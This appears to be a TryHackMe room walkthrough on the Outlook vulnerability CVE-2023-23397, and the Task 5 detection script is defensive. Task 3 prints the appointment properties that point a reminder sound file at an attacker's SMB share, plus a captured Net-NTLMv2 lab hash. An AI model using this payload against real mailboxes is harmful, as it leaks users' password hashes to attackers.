In this walkthrough, we will go through the Outlook NTLM Leak room from TryHackMe. This room covers the exploitation of CVE-2023-23397, which leaks password hashes from a user by sending them an email. So, let’s get started without any delay.
Task 1 – Introduction
Question 1 – Start the VM and continue learning!
Done
On Tuesday, March 14th, Microsoft released 83 security fixes on Patch Tuesday, including CVE-2023-23397. This critical vulnerability impacts all versions of the Outlook desktop app on any Windows system. Outlook web app (OWA) and Microsoft 365 aren’t vulnerable since they do not support NTLM authentication.
Unlike most exploits, this one is particularly dangerous because it is a zero-click exploit, meaning no user interaction is required to trigger it. Once an infected email arrives in the user’s inbox, the attacker can obtain sensitive Net-NTLMv2 credential hashes. Once malicious actors have those hashes, they can get a user’s credentials, authenticate to their system and escalate privileges.
Task 2 – Abusing Appointment Alerts
Question 1 – Click and continue learning!
Done
Task 3 – Crafting a Malicious Appointment
Question 1 – Click and continue learning!
Done
AppointmentItem.ReminderOverrideDefault = true
AppointmentItem.ReminderPlaySound = true
AppointmentItem.ReminderSoundFile = "\\10.10.183.48\nonexistent\sound.wav"
Administrator::THM-LAB:ceea8682077d7ab1:42A4F7AD8064006EFC44ADB8794FA5A7:0101000000000000009C3A687269D90106CC8D11F293FFBF0000000002000800560054003200470001001E00570049004E002D0054004E0035005600410057003800450041003000580004003400570049004E002D0054004E003500560041005700380045004100300058002E0056005400320047002E004C004F00430041004C000300140056005400320047002E004C004F00430041004C000500140056005400320047002E004C004F00430041004C0007000800009C3A687269D901060004000200000008003000300000000000000000000000003000009C63A468135C41065CCDB62C9B75754A0B92AD8B8ED1AE763C7EDEB4D8D5657C0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E003100380033002E00340038000000000000000000
Task 4 – Weaponizing the Vulnerability
Question 1 – Click and continue learning!
Done
Task 5 – Detection/Mitigation
Question 1 – Click and continue learning!
Done
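For detection, the three reminder properties set in Task 3 give a concrete thing to look for: a ReminderSoundFile value that resolves to a remote host instead of a local file. The check below is an added example, not code from the room or from this walkthrough; the record layout, the helper names and every sample value except the lab path from Task 3 are assumptions.

```python
# Constructed sample records (not real mailbox data). The keys mirror the three
# AppointmentItem properties shown in Task 3; the export format is assumed.
SAMPLE_ITEMS = [
    {"subject": "Standup", "ReminderOverrideDefault": False,
     "ReminderPlaySound": True, "ReminderSoundFile": ""},
    {"subject": "Payroll", "ReminderOverrideDefault": True,
     "ReminderPlaySound": True, "ReminderSoundFile": r"C:\Windows\Media\Alarm01.wav"},
    {"subject": "Lab item", "ReminderOverrideDefault": True,
     "ReminderPlaySound": True, "ReminderSoundFile": r"\\10.10.183.48\nonexistent\sound.wav"},
    {"subject": "Long form", "ReminderOverrideDefault": True,
     "ReminderPlaySound": False, "ReminderSoundFile": r"\\?\UNC\files.example.test\s\a.wav"},
    {"subject": "WebDAV form", "ReminderOverrideDefault": True,
     "ReminderPlaySound": True, "ReminderSoundFile": "//files.example.test@SSL@443/s/a.wav"},
    {"subject": "Device path", "ReminderOverrideDefault": True,
     "ReminderPlaySound": True, "ReminderSoundFile": r"\\?\C:\Windows\Media\Alarm01.wav"},
]

def remote_host(path):
    """Return (host, transport) when path points at a remote server, else None."""
    p = path.strip().replace("/", "\\")       # forward slashes are accepted as separators
    if not p.startswith("\\\\"):
        return None                           # drive-letter or relative path: local file
    rest = p[2:]
    if rest[:2] in ("?\\", ".\\"):            # \\?\ or \\.\ device namespace
        if rest[2:6].upper() != "UNC\\":
            return None                       # e.g. \\?\C:\... is still a local file
        rest = rest[6:]
    server = rest.split("\\", 1)[0]
    if not server:
        return None
    host, _, suffix = server.partition("@")   # host@80 / host@SSL@443 selects WebDAV
    return host, ("webdav" if suffix else "smb")

def audit(items):
    """List every item whose reminder sound file would be fetched from a remote host."""
    findings = []
    for item in items:
        hit = remote_host(item.get("ReminderSoundFile") or "")
        if hit is None:
            continue
        all_three = bool(item.get("ReminderOverrideDefault") and item.get("ReminderPlaySound"))
        findings.append({"subject": item["subject"], "host": hit[0],
                         "transport": hit[1], "all_three_set": all_three})
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_ITEMS):
        print(finding)
```

Private addresses such as the lab's 10.10.183.48 are flagged as well, so a filter that only looks for external hosts would miss the room's own item.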
Task 6 – Conclusions
So that was “Outlook NTLM Leak” for you. In this room, we covered CVE-2023-23397, a critical zero-click vulnerability that impacts all versions of the Outlook desktop app on any Windows system. Once an infected email arrives in the user’s inbox, the attacker can obtain sensitive Net-NTLMv2 credential hashes. Once malicious actors have those hashes, they can get a user’s credentials, authenticate to their system, escalate privileges and much more. On that note, I will take my leave and will meet you in the next one. Till then, “Keep Hacking”.